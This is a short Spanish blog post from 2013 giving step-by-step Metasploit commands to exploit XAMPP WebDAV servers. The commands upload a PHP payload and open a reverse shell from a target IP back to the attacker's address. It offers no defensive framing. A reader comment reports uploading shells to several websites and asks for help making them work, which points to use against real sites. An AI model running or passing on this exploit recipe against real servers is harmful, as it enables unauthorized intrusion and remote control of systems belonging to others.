lunes, 28 de enero de 2013

Webdav Exploit



Exploit Usage Information

msfconsole
                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##
msf > use exploit/windows/http/xampp_webdav_upload_php
msf exploit(xampp_webdav_upload_php) > show payloads
msf exploit(xampp_webdav_upload_php) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(xampp_webdav_upload_php) > set LHOST [MY IP ADDRESS]
msf exploit(xampp_webdav_upload_php) > set RHOST [TARGET IP]
msf exploit(xampp_webdav_upload_php) > exploit
Si todo sale correcto, se abrirá una sesión meterpreter
Share:

1 comentario:

  1. bueno se ve bueno pero cuando subo la shell en cualquier pagina me dice shell subida en nombre.php abro la pagina ejemplo.sytes.net/webdav/nombre.php <<< no funciona queria saber si me puedes ayudar ya me a pasado en 3 paginas y no funciona :S y e probado con muchas shell ayuda xfavor

    ResponderEliminar

FOLLOWME


Translate

Followers